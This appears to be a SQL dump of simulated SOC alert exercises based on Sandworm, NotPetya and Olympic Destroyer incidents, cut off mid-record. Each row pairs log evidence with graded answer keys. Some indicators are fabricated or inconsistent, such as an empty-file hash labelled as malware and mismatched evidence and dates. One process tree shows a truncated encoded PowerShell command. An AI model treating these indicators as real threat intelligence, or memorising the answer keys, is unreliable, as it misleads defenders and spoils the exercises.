(977, 'Malware Execution and Spread - NotPetya Detected', 'critical', 'Endpoint detection systems', 'The NotPetya malware has been executed on the network, identified through rapid spreading and data wiping across multiple systems. Immediate containment and analysis are required to prevent further damage.', 'Wiper Malware', 'T1485 - Data Destruction', 1, 'resolved', NULL, '{\"timestamp\":\"2023-10-12T14:23:45Z\",\"event_id\":\"evt-4567\",\"source_ip\":\"185.92.220.45\",\"destination_ip\":\"192.168.1.25\",\"hostname\":\"workstation-01\",\"username\":\"jdoe\",\"malware_name\":\"NotPetya\",\"file_path\":\"C:\\\\Windows\\\\System32\\\\notpetya.exe\",\"file_hash\":\"71c4025dd989b0c6b9b3ed6e5b4c3b5d\",\"action\":\"executed\",\"status\":\"success\"}', '2026-01-17 03:39:49', '2026-02-16 17:51:56', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"185.92.220.45\",\"is_critical\":true,\"osint_result\":{\"source\":\"Threat Intelligence Feed\",\"verdict\":\"malicious\",\"details\":\"IP associated with Sandworm operations\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"192.168.1.25\",\"is_critical\":true,\"osint_result\":{\"source\":\"Internal Network\",\"verdict\":\"internal\",\"details\":\"Compromised endpoint\"}},{\"id\":\"artifact_3\",\"type\":\"filename\",\"value\":\"C:\\\\Windows\\\\System32\\\\notpetya.exe\",\"is_critical\":true,\"osint_result\":{\"source\":\"Endpoint detection systems\",\"verdict\":\"malicious\",\"details\":\"Known NotPetya executable\"}},{\"id\":\"artifact_4\",\"type\":\"hash\",\"value\":\"71c4025dd989b0c6b9b3ed6e5b4c3b5d\",\"is_critical\":true,\"osint_result\":{\"source\":\"Malware Analysis Report\",\"verdict\":\"malicious\",\"details\":\"Hash associated with NotPetya\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"collect_forensics\",\"escalate\"]}', 'novice', 'MAL', 1, 0, NULL, NULL, NULL, '{\"tool\":\"EDR\",\"evidence\":{\"hostname\":\"WORKSTATION-01\",\"os\":\"Windows 10 Enterprise\",\"agent_version\":\"7.12.0\",\"process_tree\":[{\"id\":100,\"name\":\"explorer.exe\",\"pid\":4520,\"user\":\"jdoe\",\"cmd\":\"explorer.exe\",\"integrity\":\"Medium\",\"children\":[101]},{\"id\":101,\"name\":\"powershell.exe\",\"pid\":5100,\"user\":\"jdoe\",\"cmd\":\"powershell.exe -nop -enc AAB...\",\"integrity\":\"High\",\"children\":[102],\"highlight\":true},{\"id\":102,\"name\":\"conhost.exe\",\"pid\":5101,\"user\":\"jdoe\",\"cmd\":\"conhost.exe\",\"integrity\":\"High\",\"children\":[]}],\"network_connections\":[{\"pid\":5100,\"remote_ip\":\"203.0.113.55\",\"port\":443,\"state\":\"ESTABLISHED\",\"process\":\"powershell.exe\"}]}}', 0),
(978, 'Unexpected Resilience Point Discovered', 'high', 'Domain controller logs from Ghana', 'During the recovery process, an unexpected resilience point was identified in a domain controller located in Ghana. This controller played a crucial role in enabling Maersk\'s recovery efforts, emphasizing the significance of maintaining offline backups. The threat actor, Sandworm, known for destructive attacks, was involved in the incident.', 'Incident Response', 'T1485: Data Destruction', 1, 'new', NULL, '{\"timestamp\":\"2023-10-12T08:34:56Z\",\"event_source\":\"domain_controller\",\"location\":\"Ghana\",\"internal_ip\":\"10.25.36.48\",\"external_ip\":\"203.0.113.45\",\"username\":\"admin.ghana\",\"filename\":\"notpetya_recovery_tool.exe\",\"hash\":\"71b6a493388e7d0b6e1c8fbe5c0c4b5b\",\"action\":\"file_restored\",\"status\":\"success\"}', '2026-01-17 03:39:49', '2026-02-14 16:52:12', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"203.0.113.45\",\"is_critical\":true,\"osint_result\":{\"source\":\"Threat Intelligence Database\",\"verdict\":\"malicious\",\"details\":\"IP associated with known Sandworm activity\"}},{\"id\":\"artifact_2\",\"type\":\"hash\",\"value\":\"71b6a493388e7d0b6e1c8fbe5c0c4b5b\",\"is_critical\":true,\"osint_result\":{\"source\":\"Malware Database\",\"verdict\":\"suspicious\",\"details\":\"Hash linked to NotPetya recovery operations\"}},{\"id\":\"artifact_3\",\"type\":\"username\",\"value\":\"admin.ghana\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal User Directory\",\"verdict\":\"internal\",\"details\":\"Legitimate domain admin account\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"block_ip\",\"block_hash\",\"collect_forensics\",\"escalate\"]}', 'novice', 'MAL', 1, 0, NULL, NULL, NULL, '{\"tool\":\"SIEM\",\"evidence\":{\"events\":[{\"timestamp\":\"2026-02-01T20:32:22.668Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-12T08:34:56Z\\\",\\\"event_source\\\":\\\"domain_controller\\\",\\\"location\\\":\\\"Ghana\\\",\\\"internal_ip\\\":\\\"10.25.36.48\\\",\\\"external_ip\\\":\\\"203.0.113.45\\\",\\\"username\\\":\\\"admin.ghana\\\",\\\"filename\\\":\\\"notpetya_recovery_tool.exe\\\",\\\"hash\\\":\\\"71b6a493388e7d0b6e1c8fbe5c0c4b5b\\\",\\\"action\\\":\\\"file_restored\\\",\\\"status\\\":\\\"success\\\"}\"},{\"timestamp\":\"2026-02-01T20:31:22.668Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 1]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-12T08:34:56Z\\\",\\\"event_source\\\":\\\"domain_controller\\\",\\\"location\\\":\\\"Ghana\\\",\\\"internal_ip\\\":\\\"10.25.36.48\\\",\\\"external_ip\\\":\\\"203.0.113.45\\\",\\\"username\\\":\\\"admin.ghana\\\",\\\"filename\\\":\\\"notpetya_recovery_tool.exe\\\",\\\"hash\\\":\\\"71b6a493388e7d0b6e1c8fbe5c0c4b5b\\\",\\\"action\\\":\\\"file_restored\\\",\\\"status\\\":\\\"success\\\"}\"},{\"timestamp\":\"2026-02-01T20:30:22.668Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 2]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-12T08:34:56Z\\\",\\\"event_source\\\":\\\"domain_controller\\\",\\\"location\\\":\\\"Ghana\\\",\\\"internal_ip\\\":\\\"10.25.36.48\\\",\\\"external_ip\\\":\\\"203.0.113.45\\\",\\\"username\\\":\\\"admin.ghana\\\",\\\"filename\\\":\\\"notpetya_recovery_tool.exe\\\",\\\"hash\\\":\\\"71b6a493388e7d0b6e1c8fbe5c0c4b5b\\\",\\\"action\\\":\\\"file_restored\\\",\\\"status\\\":\\\"success\\\"}\"},{\"timestamp\":\"2026-02-01T20:29:22.668Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 3]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-12T08:34:56Z\\\",\\\"event_source\\\":\\\"domain_controller\\\",\\\"location\\\":\\\"Ghana\\\",\\\"internal_ip\\\":\\\"10.25.36.48\\\",\\\"external_ip\\\":\\\"203.0.113.45\\\",\\\"username\\\":\\\"admin.ghana\\\",\\\"filename\\\":\\\"notpetya_recovery_tool.exe\\\",\\\"hash\\\":\\\"71b6a493388e7d0b6e1c8fbe5c0c4b5b\\\",\\\"action\\\":\\\"file_restored\\\",\\\"status\\\":\\\"success\\\"}\"},{\"timestamp\":\"2026-02-01T20:28:22.668Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 4]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-12T08:34:56Z\\\",\\\"event_source\\\":\\\"domain_controller\\\",\\\"location\\\":\\\"Ghana\\\",\\\"internal_ip\\\":\\\"10.25.36.48\\\",\\\"external_ip\\\":\\\"203.0.113.45\\\",\\\"username\\\":\\\"admin.ghana\\\",\\\"filename\\\":\\\"notpetya_recovery_tool.exe\\\",\\\"hash\\\":\\\"71b6a493388e7d0b6e1c8fbe5c0c4b5b\\\",\\\"action\\\":\\\"file_restored\\\",\\\"status\\\":\\\"success\\\"}\"}],\"query\":\"index=main source=\\\"/var/log/syslog\\\" | head 100\"}}', 0),
(979, 'Initial Breach Detected in Corporate Network', 'high', 'Network Traffic Analysis', 'The initial breach was identified as a supply chain compromise through a software update from a third-party vendor. This technique is characteristic of Sandworm, known for leveraging compromised software updates to gain initial access. Analysis of network traffic revealed malicious activity originating from a known malicious IP address associated with Sandworm activities.', 'Supply Chain Compromise', 'T1195.002 - Supply Chain Compromise: Compromise Software Supply Chain', 1, 'new', NULL, '{\"timestamp\":\"2023-10-15T03:21:45Z\",\"source_ip\":\"203.0.113.45\",\"destination_ip\":\"10.0.0.25\",\"destination_port\":443,\"protocol\":\"TLS\",\"detected_threat\":\"Suspicious Software Update\",\"file_hash\":\"e99a18c428cb38d5f260853678922e03\",\"filename\":\"update_package_v1.2.exe\",\"user_agent\":\"ThirdPartyUpdater/1.2\",\"malware_family\":\"Sandworm\",\"vendor\":\"CompromisedVendor\"}', '2026-01-17 03:41:52', '2026-02-14 16:52:12', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"203.0.113.45\",\"is_critical\":true,\"osint_result\":{\"source\":\"Threat Intelligence Feed\",\"verdict\":\"malicious\",\"details\":\"IP associated with previous Sandworm activities.\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"10.0.0.25\",\"is_critical\":true,\"osint_result\":{\"source\":\"Internal Network\",\"verdict\":\"internal\",\"details\":\"Corporate internal IP address.\"}},{\"id\":\"artifact_3\",\"type\":\"hash\",\"value\":\"e99a18c428cb38d5f260853678922e03\",\"is_critical\":true,\"osint_result\":{\"source\":\"Malware Database\",\"verdict\":\"malicious\",\"details\":\"Hash matches known Sandworm malware.\"}},{\"id\":\"artifact_4\",\"type\":\"filename\",\"value\":\"update_package_v1.2.exe\",\"is_critical\":true,\"osint_result\":{\"source\":\"Internal Analysis\",\"verdict\":\"malicious\",\"details\":\"File used in a suspicious software update.\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"collect_forensics\"]}', 'expert', 'MAL', 1, 0, NULL, NULL, NULL, '{\"tool\":\"Firewall\",\"evidence\":{\"policy_name\":\"Block_Outbound_Direct_IP\",\"action\":\"ALLOW\",\"interface_in\":\"eth0\",\"interface_out\":\"eth1\",\"packets\":[{\"time\":\"10:00:01\",\"src\":\"10.0.0.5\",\"dst\":\"8.8.8.8\",\"proto\":\"UDP\",\"port\":53,\"size\":120,\"action\":\"ALLOW\"},{\"time\":\"10:00:02\",\"src\":\"10.0.0.5\",\"dst\":\"203.0.113.15\",\"proto\":\"TCP\",\"port\":443,\"size\":1500,\"action\":\"ALLOW\",\"alert\":true}]}}', 0),
(980, 'Execution of NotPetya Payload', 'critical', 'Endpoint Detection and Response (EDR)', 'Shortly after the initial breach, NotPetya was executed on multiple endpoints, initiating its destructive payload and encrypting critical files.', 'Destructive Malware Deployment', 'T1486: Data Encrypted for Impact', 1, 'resolved', NULL, '{\"timestamp\":\"2023-10-11T14:25:43Z\",\"event_id\":\"EVT-20231011-00002\",\"host_ip\":\"192.168.1.34\",\"malware_name\":\"NotPetya\",\"file_path\":\"C:\\\\Windows\\\\System32\\\\perfc.dat\",\"file_hash\":\"71b6a493388e7d0b40c83ce903bc6b04\",\"attacker_ip\":\"185.92.220.39\",\"username\":\"jdoe\",\"action\":\"File Execution\",\"severity\":\"Critical\",\"message\":\"NotPetya payload executed, initiating encryption of system files.\"}', '2026-01-17 03:41:52', '2026-02-16 17:51:02', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"192.168.1.34\",\"is_critical\":true,\"osint_result\":{\"source\":\"internal network\",\"verdict\":\"internal\",\"details\":\"Internal host affected by NotPetya execution.\"}},{\"id\":\"artifact_2\",\"type\":\"hash\",\"value\":\"71b6a493388e7d0b40c83ce903bc6b04\",\"is_critical\":true,\"osint_result\":{\"source\":\"VirusTotal\",\"verdict\":\"malicious\",\"details\":\"Known NotPetya file hash.\"}},{\"id\":\"artifact_3\",\"type\":\"ip\",\"value\":\"185.92.220.39\",\"is_critical\":true,\"osint_result\":{\"source\":\"Threat Intelligence\",\"verdict\":\"malicious\",\"details\":\"Associated with previous NotPetya campaigns.\"}},{\"id\":\"artifact_4\",\"type\":\"filename\",\"value\":\"C:\\\\Windows\\\\System32\\\\perfc.dat\",\"is_critical\":true,\"osint_result\":{\"source\":\"Endpoint Analysis\",\"verdict\":\"malicious\",\"details\":\"File used by NotPetya for destructive purposes.\"}},{\"id\":\"artifact_5\",\"type\":\"username\",\"value\":\"jdoe\",\"is_critical\":false,\"osint_result\":{\"source\":\"Active Directory\",\"verdict\":\"suspicious\",\"details\":\"User associated with compromised host.\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"collect_forensics\",\"escalate\"]}', 'expert', 'MAL', 1, 0, NULL, NULL, NULL, '{\"tool\":\"EDR\",\"evidence\":{\"hostname\":\"WORKSTATION-01\",\"os\":\"Windows 10 Enterprise\",\"agent_version\":\"7.12.0\",\"process_tree\":[{\"id\":100,\"name\":\"explorer.exe\",\"pid\":4520,\"user\":\"jdoe\",\"cmd\":\"explorer.exe\",\"integrity\":\"Medium\",\"children\":[101]},{\"id\":101,\"name\":\"powershell.exe\",\"pid\":5100,\"user\":\"jdoe\",\"cmd\":\"powershell.exe -nop -enc AAB...\",\"integrity\":\"High\",\"children\":[102],\"highlight\":true},{\"id\":102,\"name\":\"conhost.exe\",\"pid\":5101,\"user\":\"jdoe\",\"cmd\":\"conhost.exe\",\"integrity\":\"High\",\"children\":[]}],\"network_connections\":[{\"pid\":5100,\"remote_ip\":\"203.0.113.55\",\"port\":443,\"state\":\"ESTABLISHED\",\"process\":\"powershell.exe\"}]}}', 0),
(981, 'Establishing Persistence in Network - Backdoor Installation Detected', 'high', 'Log Analysis', 'Sandworm group has installed backdoors on compromised systems to maintain persistent access. This operation is aimed at re-establishing access points that allow for re-entry, complicating recovery and mitigation efforts.', 'Backdoor Installation', 'T1543: Create or Modify System Process', 1, 'new', NULL, '{\"timestamp\":\"2023-10-12T14:23:45Z\",\"event_id\":\"4624\",\"source_ip\":\"185.23.124.8\",\"destination_ip\":\"10.0.0.55\",\"username\":\"admin_user\",\"file_path\":\"C:\\\\Windows\\\\System32\\\\drivers\\\\svchost.exe\",\"file_hash\":\"d41d8cd98f00b204e9800998ecf8427e\",\"action\":\"Backdoor installation\",\"description\":\"Malicious file svchost.exe with hash d41d8cd98f00b204e9800998ecf8427e detected on system 10.0.0.55 from source IP 185.23.124.8.\"}', '2026-01-17 03:41:52', '2026-02-14 16:52:12', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"185.23.124.8\",\"is_critical\":true,\"osint_result\":{\"source\":\"AlienVault OTX\",\"verdict\":\"malicious\",\"details\":\"IP associated with known threat actor activities.\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"10.0.0.55\",\"is_critical\":true,\"osint_result\":{\"source\":\"Internal Inventory\",\"verdict\":\"internal\",\"details\":\"Internal server targeted for backdoor installation.\"}},{\"id\":\"artifact_3\",\"type\":\"hash\",\"value\":\"d41d8cd98f00b204e9800998ecf8427e\",\"is_critical\":true,\"osint_result\":{\"source\":\"VirusTotal\",\"verdict\":\"malicious\",\"details\":\"Hash corresponds to known malware used by Sandworm.\"}},{\"id\":\"artifact_4\",\"type\":\"filename\",\"value\":\"svchost.exe\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal Analysis\",\"verdict\":\"suspicious\",\"details\":\"File name commonly used in masquerading attacks.\"}},{\"id\":\"artifact_5\",\"type\":\"username\",\"value\":\"admin_user\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal Directory\",\"verdict\":\"internal\",\"details\":\"Administrative account used in unauthorized activities.\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"]}', 'expert', 'MAL', 1, 0, NULL, NULL, NULL, '{\"tool\":\"SIEM\",\"evidence\":{\"events\":[{\"timestamp\":\"2026-02-01T20:32:22.671Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-12T14:23:45Z\\\",\\\"event_id\\\":\\\"4624\\\",\\\"source_ip\\\":\\\"185.23.124.8\\\",\\\"destination_ip\\\":\\\"10.0.0.55\\\",\\\"username\\\":\\\"admin_user\\\",\\\"file_path\\\":\\\"C:\\\\\\\\Windows\\\\\\\\System32\\\\\\\\drivers\\\\\\\\svchost.exe\\\",\\\"file_hash\\\":\\\"d41d8cd98f00b204e9800998ecf8427e\\\",\\\"action\\\":\\\"Backdoor installation\\\",\\\"description\\\":\\\"Malicious file svchost.exe with hash d41d8cd98f00b204e9800998ecf8427e detected on system 10.0.0.55 from source IP 185.23.124.8.\\\"}\"},{\"timestamp\":\"2026-02-01T20:31:22.671Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 1]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-12T14:23:45Z\\\",\\\"event_id\\\":\\\"4624\\\",\\\"source_ip\\\":\\\"185.23.124.8\\\",\\\"destination_ip\\\":\\\"10.0.0.55\\\",\\\"username\\\":\\\"admin_user\\\",\\\"file_path\\\":\\\"C:\\\\\\\\Windows\\\\\\\\System32\\\\\\\\drivers\\\\\\\\svchost.exe\\\",\\\"file_hash\\\":\\\"d41d8cd98f00b204e9800998ecf8427e\\\",\\\"action\\\":\\\"Backdoor installation\\\",\\\"description\\\":\\\"Malicious file svchost.exe with hash d41d8cd98f00b204e9800998ecf8427e detected on system 10.0.0.55 from source IP 185.23.124.8.\\\"}\"},{\"timestamp\":\"2026-02-01T20:30:22.671Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 2]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-12T14:23:45Z\\\",\\\"event_id\\\":\\\"4624\\\",\\\"source_ip\\\":\\\"185.23.124.8\\\",\\\"destination_ip\\\":\\\"10.0.0.55\\\",\\\"username\\\":\\\"admin_user\\\",\\\"file_path\\\":\\\"C:\\\\\\\\Windows\\\\\\\\System32\\\\\\\\drivers\\\\\\\\svchost.exe\\\",\\\"file_hash\\\":\\\"d41d8cd98f00b204e9800998ecf8427e\\\",\\\"action\\\":\\\"Backdoor installation\\\",\\\"description\\\":\\\"Malicious file svchost.exe with hash d41d8cd98f00b204e9800998ecf8427e detected on system 10.0.0.55 from source IP 185.23.124.8.\\\"}\"},{\"timestamp\":\"2026-02-01T20:29:22.671Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 3]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-12T14:23:45Z\\\",\\\"event_id\\\":\\\"4624\\\",\\\"source_ip\\\":\\\"185.23.124.8\\\",\\\"destination_ip\\\":\\\"10.0.0.55\\\",\\\"username\\\":\\\"admin_user\\\",\\\"file_path\\\":\\\"C:\\\\\\\\Windows\\\\\\\\System32\\\\\\\\drivers\\\\\\\\svchost.exe\\\",\\\"file_hash\\\":\\\"d41d8cd98f00b204e9800998ecf8427e\\\",\\\"action\\\":\\\"Backdoor installation\\\",\\\"description\\\":\\\"Malicious file svchost.exe with hash d41d8cd98f00b204e9800998ecf8427e detected on system 10.0.0.55 from source IP 185.23.124.8.\\\"}\"},{\"timestamp\":\"2026-02-01T20:28:22.671Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 4]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-12T14:23:45Z\\\",\\\"event_id\\\":\\\"4624\\\",\\\"source_ip\\\":\\\"185.23.124.8\\\",\\\"destination_ip\\\":\\\"10.0.0.55\\\",\\\"username\\\":\\\"admin_user\\\",\\\"file_path\\\":\\\"C:\\\\\\\\Windows\\\\\\\\System32\\\\\\\\drivers\\\\\\\\svchost.exe\\\",\\\"file_hash\\\":\\\"d41d8cd98f00b204e9800998ecf8427e\\\",\\\"action\\\":\\\"Backdoor installation\\\",\\\"description\\\":\\\"Malicious file svchost.exe with hash d41d8cd98f00b204e9800998ecf8427e detected on system 10.0.0.55 from source IP 185.23.124.8.\\\"}\"}],\"query\":\"index=main source=\\\"/var/log/syslog\\\" | head 100\"}}', 0),
(982, 'Lateral Movement Across Vaccine Production Systems', 'high', 'Active Directory Monitoring', 'Using stolen credentials, attackers moved laterally to infiltrate systems involved in vaccine production, severely disrupting operations.', 'Credential Theft and Use', 'T1078', 1, 'new', NULL, '{\"timestamp\":\"2023-10-15T14:23:45Z\",\"event_id\":\"4624\",\"event_type\":\"Logon\",\"logon_type\":\"Network\",\"source_ip\":\"185.23.56.7\",\"destination_ip\":\"10.0.5.23\",\"username\":\"j.doe\",\"logon_process\":\"NtLmSsp\",\"authentication_package\":\"NTLM\",\"logon_guid\":\"{1d9b6895-1234-5678-9876-abcdef012345}\",\"hash\":\"3a6eb5e9a76c38b4f9644f2bbf1f2d3c\",\"filename\":\"OlympicDestroyer.exe\",\"additional_info\":{\"source_hostname\":\"Vaccine-Prod-DC\",\"destination_hostname\":\"Vaccine-Prod-Sys01\",\"privileges\":\"SeChangeNotifyPrivilege\",\"malware_tool\":\"Olympic Destroyer\"}}', '2026-01-17 03:41:52', '2026-02-14 17:06:55', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"185.23.56.7\",\"is_critical\":true,\"osint_result\":{\"source\":\"Threat Intel Platform\",\"verdict\":\"malicious\",\"details\":\"IP associated with Sandworm APT activity\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"10.0.5.23\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal Network\",\"verdict\":\"internal\",\"details\":\"Internal IP of vaccine production system\"}},{\"id\":\"artifact_3\",\"type\":\"username\",\"value\":\"j.doe\",\"is_critical\":true,\"osint_result\":{\"source\":\"Internal Directory\",\"verdict\":\"suspicious\",\"details\":\"Account credentials used in unauthorized access\"}},{\"id\":\"artifact_4\",\"type\":\"hash\",\"value\":\"3a6eb5e9a76c38b4f9644f2bbf1f2d3c\",\"is_critical\":true,\"osint_result\":{\"source\":\"Malware Database\",\"verdict\":\"malicious\",\"details\":\"Hash matches Olympic Destroyer malware\"}},{\"id\":\"artifact_5\",\"type\":\"filename\",\"value\":\"OlympicDestroyer.exe\",\"is_critical\":true,\"osint_result\":{\"source\":\"File Analysis\",\"verdict\":\"malicious\",\"details\":\"File associated with destructive malware activity\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"escalate\"]}', 'expert', 'NDR', 1, 0, NULL, NULL, NULL, '{\"tool\":\"Identity\",\"evidence\":{\"user\":{\"username\":\"jdoe\",\"display_name\":\"John Doe\",\"department\":\"Finance\",\"manager\":\"Jane Smith\"},\"risk_score\":85,\"recent_activity\":[{\"action\":\"Login Success\",\"ip\":\"10.0.0.5\",\"location\":\"New York, US\",\"time\":\"09:00 AM\"},{\"action\":\"Password Reset Request\",\"ip\":\"192.168.1.5\",\"location\":\"New York, US\",\"time\":\"09:05 AM\"},{\"action\":\"Login Failed\",\"ip\":\"203.0.113.99\",\"location\":\"Moscow, RU\",\"time\":\"02:00 AM\",\"flag\":true}]}}', 0),
(983, 'Data Exfiltration of Sensitive Information', 'critical', 'Data Loss Prevention (DLP)', 'The attackers exfiltrated sensitive data, including proprietary research and operational plans, exacerbating the impact of the attack. The activity is attributed to the Sandworm group known for its destructive attacks and targeting of ICS/SCADA systems.', 'Data Theft', 'T1048: Exfiltration Over Alternative Protocol', 1, 'resolved', NULL, '{\"timestamp\":\"2023-10-14T13:45:32Z\",\"event_id\":\"DLP-EXFIL-23456\",\"source_ip\":\"192.168.1.105\",\"destination_ip\":\"203.0.113.45\",\"username\":\"j.doe\",\"file_hash\":\"d2d2d2d2d2d2d2d2d2d2d2d2d2d2d2d2d2d2d2d2d2d2d2d2d2d2d2d2d2d2d2d2\",\"filename\":\"Operational_Research_Data.pdf\",\"protocol\":\"HTTPS\",\"action\":\"Allowed\",\"data_volume\":\"2GB\",\"alert_trigger\":\"Sensitive Data Exfiltration\",\"malware_associated\":\"NotPetya\",\"attacker_ip\":\"203.0.113.45\"}', '2026-01-17 03:41:52', '2026-02-16 17:51:21', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"192.168.1.105\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal Network\",\"verdict\":\"internal\",\"details\":\"Internal source IP involved in the data exfiltration.\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"203.0.113.45\",\"is_critical\":true,\"osint_result\":{\"source\":\"OSINT\",\"verdict\":\"malicious\",\"details\":\"Known malicious IP associated with Sandworm group.\"}},{\"id\":\"artifact_3\",\"type\":\"hash\",\"value\":\"d2d2d2d2d2d2d2d2d2d2d2d2d2d2d2d2d2d2d2d2d2d2d2d2d2d2d2d2d2d2d2d2\",\"is_critical\":true,\"osint_result\":{\"source\":\"Malware Analysis\",\"verdict\":\"malicious\",\"details\":\"Hash associated with NotPetya malware.\"}},{\"id\":\"artifact_4\",\"type\":\"filename\",\"value\":\"Operational_Research_Data.pdf\",\"is_critical\":true,\"osint_result\":{\"source\":\"DLP\",\"verdict\":\"sensitive\",\"details\":\"File containing sensitive operational and research data.\"}},{\"id\":\"artifact_5\",\"type\":\"username\",\"value\":\"j.doe\",\"is_critical\":true,\"osint_result\":{\"source\":\"Internal Database\",\"verdict\":\"internal\",\"details\":\"Internal user account involved in the exfiltration.\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"collect_forensics\",\"escalate\"]}', 'expert', 'MAL', 1, 0, NULL, NULL, NULL, '{\"tool\":\"SIEM\",\"evidence\":{\"events\":[{\"timestamp\":\"2026-02-01T20:32:22.673Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-14T13:45:32Z\\\",\\\"event_id\\\":\\\"DLP-EXFIL-23456\\\",\\\"source_ip\\\":\\\"192.168.1.105\\\",\\\"destination_ip\\\":\\\"203.0.113.45\\\",\\\"username\\\":\\\"j.doe\\\",\\\"file_hash\\\":\\\"d2d2d2d2d2d2d2d2d2d2d2d2d2d2d2d2d2d2d2d2d2d2d2d2d2d2d2d2d2d2d2d2\\\",\\\"filename\\\":\\\"Operational_Research_Data.pdf\\\",\\\"protocol\\\":\\\"HTTPS\\\",\\\"action\\\":\\\"Allowed\\\",\\\"data_volume\\\":\\\"2GB\\\",\\\"alert_trigger\\\":\\\"Sensitive Data Exfiltration\\\",\\\"malware_associated\\\":\\\"NotPetya\\\",\\\"attacker_ip\\\":\\\"203.0.113.45\\\"}\"},{\"timestamp\":\"2026-02-01T20:31:22.673Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 